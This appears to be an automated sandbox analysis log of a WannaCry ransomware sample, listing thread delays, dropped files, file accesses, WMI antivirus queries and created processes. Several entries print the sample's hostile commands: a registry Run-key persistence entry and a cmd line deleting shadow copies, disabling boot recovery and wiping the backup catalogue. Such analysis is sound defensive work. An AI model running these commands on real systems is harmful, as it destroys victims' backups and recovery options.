              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeWindow / User API: threadDelayed 1258
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeWindow / User API: threadDelayed 2893
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeWindow / User API: threadDelayed 3150
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7552Thread sleep count: 87 > 30
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7552Thread sleep time: -87000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7560Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7564Thread sleep count: 47 > 30
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7564Thread sleep time: -141000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7592Thread sleep count: 55 > 30
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7592Thread sleep time: -1650000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7568Thread sleep count: 39 > 30
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7568Thread sleep time: -1170000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7416Thread sleep count: 1258 > 30
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7552Thread sleep count: 2893 > 30
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7552Thread sleep time: -2893000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7564Thread sleep count: 3150 > 30
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 7564Thread sleep time: -9450000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeThread sleep count: Count: 1258 delay: -10
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeThread delayed: delay time: 30000
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeThread delayed: delay time: 30000
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SD37EB.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\~SD37ED.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\~SD37EC.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\~SD37EE.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\~SD37EF.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\~SD37EA.tmpJump to behavior
              Source: cscript.exe, 00000014.00000002.1425430510.00000000033C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: taskhsvc.exe, 00000069.00000003.1983778466.0000000004D41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NQlHmIgvMciBuhwdPcSThyF+dlD3aS5b0hF+ClVEa0y8nR24HtbVAgMBAAE=
              Source: taskhsvc.exe, 00000069.00000003.1931824765.0000000004D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dvnwTnVMcixijEcyDacoPt8KC0YMEBNYinwYXPRGzsGNOomr4WARAgMBAAE=
              Source: taskhsvc.exe, 00000069.00000003.1916186938.0000000004D78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /kLm9EfvtC9L86WDqVYIZpZECaPIUejhmC+DEHKwsVMCIam6wr+LAgMBAAE=
              Source: taskhsvc.exe, 00000069.00000003.1889741299.0000000004D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
              Source: @WanaDecryptor@.exe, 0000004B.00000003.1530506863.0000000000796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\consent.exeMemory written: C:\Windows\System32\svchost.exe base: 7E639FE2C8
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: C:\Windows\SysWOW64\cscript.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\consent.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\~SD3862.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\~SDAD92.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\~SDAD7B.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\~SD3861.tmpJump to behavior
